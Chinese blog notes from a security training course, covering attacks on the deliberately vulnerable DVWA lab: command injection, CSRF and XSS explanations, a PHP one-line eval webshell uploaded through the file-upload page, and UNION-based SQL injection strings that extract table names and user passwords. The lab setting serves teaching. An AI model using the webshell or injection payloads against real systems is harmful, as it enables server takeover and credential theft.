2021-05-07

最新推荐文章于 2024-05-20 17:16:41 发布
最新推荐文章于 2024-05-20 17:16:41 发布
阅读量96 收藏
点赞数 4
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51825572/article/details/116491498
版权

2021.05 信息安全实训课课程笔记

Web安全加固笔记

安装部署phpStudy+DVWA漏洞演练平台

安装phpstudy,安装完成后启动phpStudy主界面

解压DVWA

DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。

一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

密码登录绕过

命令注入

window和linux系统都可以用&&在同一行执行多条命令

跨站请求伪造

csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。

  

补充:

反射型跨站:

通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。

它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。

存储型跨站:

因为存储外部数据而引发的XSS漏洞,存储型XSS漏洞广泛出现在允许Web用户自定义显示信息及允许Web用户上传文件信息的Web应用程序中,大部分的Web应用程序都属于此类。

文件上传

在Web应用中,上传功能是用户与服务器进行文件交互的重要手段。每个人都会接触到上传功能,以头像和附件上传功能最为常见。在这个过程中,用户会上传自己的信息,服务器接受到用户端的上传信息后将文件保存到服务器某个目录中。

文件上传攻击是指攻击者利用Web应用对上传文件过滤不严的漏洞,将应用程序定义类型范围之外的文件(木马或后门程序)上传到Web服务器,在上传成功后攻击者即可获得当前服务器的webshell。

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

攻击条件:

目标网站具有上传功能且木马能够成功上传。
上传的目标文件能够被Web服务器解析执行。
知道文件上传到服务器后的存放路径和文件名称。
目标文件可被用户访问。

建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。

打开File Upload界面,将PHP一句话木马上传,得到木马在服务器上的路径。

把上传木马路径添加到工具上。

SQL注入

1' union select 1,database()#提交,得到数据库名称。

1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。

1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。

1' union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。

XQ.Qing
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
5G智慧文旅解决方案[2021-05-07](41页).pdf
05-18
5G智慧文旅解决方案[2021-05-07](41页).pdf
网络信息安全-04
spike6699的博客
05-07 173
漏洞利用与安全加固 Web安全 -web时代 信息安全攻击有 75% 都是发生在 Web 应用层而非网络层面上。 目前对Web业务系统威胁最严重的两种攻击方式是SQL注入攻击和XSS跨站脚本攻击。 越大的系统越容易有漏洞 0.01%安全问题等于100%的失败 SQL注入 改变SQL命令的操作,将被修改的SQL命令注入到后端数据库引擎执行 内联式 终止式 攻击者注入一段包含注释符的SQL语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。 XSS跨站 反射型跨站通过给别人发送带有恶意脚本
软件漏洞---安全问题的根源
Purpleendurer@CSDN
07-11 2104
作者: Kevin Kernan评论:大多数人都赞同,安全问题的最佳长期解决方案就是使软件本身更加安全可靠。几乎每一个引起身分被盗、网络中断、数据丢失与网站崩溃的安全破坏都有一个根本的原因,即软件本身代码编写粗糙。研究公司Gartner估计,有约70%的安全攻击发生在应用层;在发展阶段修补漏洞比在应用阶段修补漏洞要便宜很多。在行业安全灾难的长期解决方案问题上,人们达成了广泛的一致,那到底是什么阻碍
企业信息安全漏洞大多由于应用软件造成
cnsinda的专栏
01-17 1169
企业信息安全经过这么多年的发展,我们可以发现不同时代黑客的攻击方式是不一样的: 从最初的猜密码,暴力破解密码,e-mail炸弹,到基于DNS、基于TCP-IP协议的攻击等,到后来的木马、蠕虫、最近几年大家所熟知的SQL 注入,跨站等基于应用软件的攻击等。 我们还可以看出,黑客攻击方式有一个很重要的变化,那就是逐渐地从攻击网络,攻击主机到攻击应用软件,攻击客户端。 再来看看我们的安
WEB安全
qq_45886314的博客
05-07 2482
WEB安全 web业务平台的不安全性主要是由web平台的特点,即开放性所致。 根据Gartner的调查,信息安全攻击有75%都是发生在Web应用层而非网络层面上。 根据世界上权威的web安全与数据库安全研究组织owASP提供的报告,目前对web业务系统威胁最严重的两种攻击方式是sQL入踟卡和xSs-陈站脚本攻击。 客户端与服务器的典型交互过程 软件都是人写的,人都会犯错或考虑问题不周的,越大的系统越容易有漏洞。 通常情况下99.99%无错的程序很少会出问题。 但99.99%无错的程序仍会被
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
数据库系统概论(2021-09-07-22-05-14).mmap
09-07
数据库系统概论(2021-09-07-22-05-14).mmap
mec-ttp-2021-winter
05-26
日程部分1-2021-01-04 主题预评估,课程规范,git基础幻灯片 作业选择自己的冒险部分2-2021-01-05 主题git续,概述项目,javascript第1部分幻灯片 作业二十一点游戏引擎 最初的小组任务,破冰船打开请求以切换组部分...
Draft 2021-02-09 05:07:51-数据集
03-04
风向方位 FXfangwei.json
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 650
作用就是定义属性之间的数学关系
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 362
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 921
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 464
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 401
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 861
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
云渲染安全吗?
qianwenxuan的博客
05-17 256
同时,我们制定了精细的访问控制策略,依据用户的角色和权限来精准调控其对数据和资源的访问权限,以确保每一份资源都受到应有的保护。很多用云渲染的设计师都想知道,在这炫云可以告诉你,用炫云是绝对安全的。那炫云是如何保证上传到炫云的数据的安全的呢?而对于那些尤为敏感的数据,我们更是采取了更高层级的加密策略,比如全盘加密或精细到数据字段级别的加密,旨在构筑一道坚不可摧的防线,全面捍卫数据的安全与完整。为确保用户上传下载数据的安全,炫云还和用户、技术人员之间签订了保密协议,没得到用户的授权,没人能够访问用户数据。
数智赋能内涝治理,四信城市排水防涝解决方案保障城市安全运行
rtu遥测终端机
05-20 308
四信城市排水防涝解决方案,采用先进的洪涝预测模型和智能监测设备,实现对城市内涝的精准预测和实时监控。方案通过智能化感知终端设备提升排水防涝智慧化水平,确保人民生命财产安全。四信的技术和服务已在多个城市内涝监测项目中得到应用,展现了其在城市安全运行保障方面的专业实力。
构建安全的GenAI/LLMs核心技术解密之大模型对抗攻击(五)
段智华的博客
05-16 27
构建安全的GenAI/LLMs核心技术解密之大模型对抗攻击(五)
扮演个python2021-01-01 周五 7° -6° 多云~晴 西南风2级 2021-01-02 周六 8° -2° 多云 东风2级 2021-01-03 周日 8° -1° 多云 东北风3级 2021-01-04 周一 9° 1° 多云~阴 东北风2级 2021-01-05 周二 4° 0° 阴 东北风3级 2021-01-06 周三 2° -7° 阴 北风3级 2021-01-07 周四 --7° 多云 北风4级 2021-01-08 周五 1° -9° 晴~多云 西北风3级 2021-0
05-17
2021-01-05 周二 4° 0° 阴 东北风3级 2021-01-06 周三 2° -7° 阴 北风3级 2021-01-07 周四 --7° 多云 北风4级 2021-01-08 周五 1° -9° 晴~多云 西北风3级 以上是2021年1月1日到1月8日的天气情况,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值